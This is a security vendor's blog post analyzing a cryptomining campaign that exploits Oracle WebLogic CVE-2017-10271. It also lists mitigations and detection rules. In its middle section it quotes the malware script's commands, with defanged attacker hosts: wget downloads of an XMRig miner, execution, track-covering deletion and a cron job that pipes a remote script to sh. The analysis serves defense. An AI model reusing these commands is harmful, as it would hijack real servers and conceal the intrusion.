By Hubert Lin
We observed a large spike in the number of devices scanning the internet for port 7001/TCP since April 27, 2018. Our analysis found that it’s increased activity was caused by cybercriminals engaging in cryptomining via exploiting CVE-2017-10271. The flaw is a patched Oracle WebLogic WLS-WSAT vulnerability that can allow remote attackers to execute arbitrary code on unpatched servers. This marks the second time attackers abused CVE-2017-10271 for cryptomining purposes this year. In February, the vulnerability was exploited to deliver 64-bit and 32-bit variants of an XMRig Monero miner.
Oracle WebLogic listens to port 7001/TCP by default. As seen below, we observed an increase in traffic caused by malicious activities on several ports, with the vast majority coming from port 7001/TCP. Having observed only 155 events between April 8 and April 26, the record between April 27 and May 9 accumulated 2,640 events from attackers with IP addresses mostly based in Russia and China.
Figure 1. Malicious traffic on April 27-May 9 was detected on several ports, mostly coming from 7001/TCP.
Based on packet traces, the payload that can trigger unpatched servers to download and execute was observed at hxxp://220.127.116.11/logo8.sh.
Figure 2. Malicious HTTP request sent to vulnerable servers
If the vulnerability is exploited successfully and the Bourne shell script logo8.sh (detected by Trend Micros as Coinminer_MALXMR.DBFAJ-Component) is downloaded, the following actions will be launched:
- Secure assets by killing possible unknown mining activities, such as:
- pkill -f minergate
- pkill -f minergate-cli
- Download and execute cryptomining executables and configurations:
- wget -O /tmp/vmak hxxp://18.104.22.168/xmrig_64
- wget -O /tmp/httpd5_w1.conf hxxp://22.214.171.124/httpd5_w1.conf
- chmod +x /tmp/vmak
- nohup /tmp/vmak -c /tmp/httpd5_w1.conf>/dev/null 2>&1 &
- Remove drops after execution to cover the attacker’s tracks:
- rm -rf /tmp/httpd5_w1.conf
- rm -f /tmp/vmak
- rm -rf /tmp/logo8.sh
- Maintain persistence by installing scheduled cron jobs:
- o echo “* * * * * wget -q hxxp://126.96.36.199/logo8.sh -O – | sh” >> /tmp/cron || true && crontab /tmp/cron
The abovementioned malicious actions are somewhat similar to our findings discussed in a blog post about the CouchDB vulnerability, which attackers exploited for their Monero mining campaign in February 2018. It’s possible that the attackers behind that campaign are also the ones targeting CVE-2017-10271 the past two weeks.
Mitigations and Solutions
Servers can be especially attractive for cryptominers since they are a source of readily available computing power, unlike other devices that can be switched off. Since cryptomining doesn’t only slow down system performance but also expose organizations and users to a different range of malware threats, these standard security best practices should be applied:
- Regularly update devices with the latest patches to help prevent attacks that exploit vulnerabilities.
- Change the device’s default credentials and use strong credentials to block unauthorized access.
- For users with home routers, enable firewalls and use available intrusion detection and prevention systems to prevent attackers from entering a device or network.
- For IT professionals, use application whitelistingand other similar security features to help detect suspicious activity and prevent suspicious executables from running or installing.
In addition, Trend Micro™ XGen™ security can provide a cross-generational blend of threat defense techniques against a full range of threats for data centers, cloud environments, networks, and endpoints. It features high-fidelity machine learning to secure the gateway and endpoint data and applications, and protects physical, virtual, and cloud workloads. With capabilities like web/URL filtering, behavioral analysis, and custom sandboxing, XGen™ protects against today’s purpose-built threats that bypass traditional controls or exploit known, unknown, or undisclosed vulnerabilities. Smart, optimized, and connected, XGen™ powers Trend Micro’s suite of security solutions: Hybrid Cloud Security, User Protection, and Network Defense.
Trend Micro™ Smart Home Network customers are already protected from threats that can exploit the Oracle WebLogic vulnerability via this rule that was released in January 2018:
- 1134359 WEB Oracle WebLogic Server WorkContextXmlInputAdapter Insecure Deserialization -1 (CVE-2017-10271)
Trend Micro™ Deep Security protects systems from threats via this DPI rule:
- 1008808 – Oracle WebLogic WLS Security Component Remote Code Execution Vulnerabilities
Trend Micro™ Deep Discovery Inspector™ protects customers via this DDI rule:
- DDI Rule ID 2600: CVE-2017-10271 – Oracle Weblogic Exploit – HTTP (Request)
- 30147: HTTP: Oracle WebLogic Command Injection Vulnerability
Indicators of Compromise (IoCs):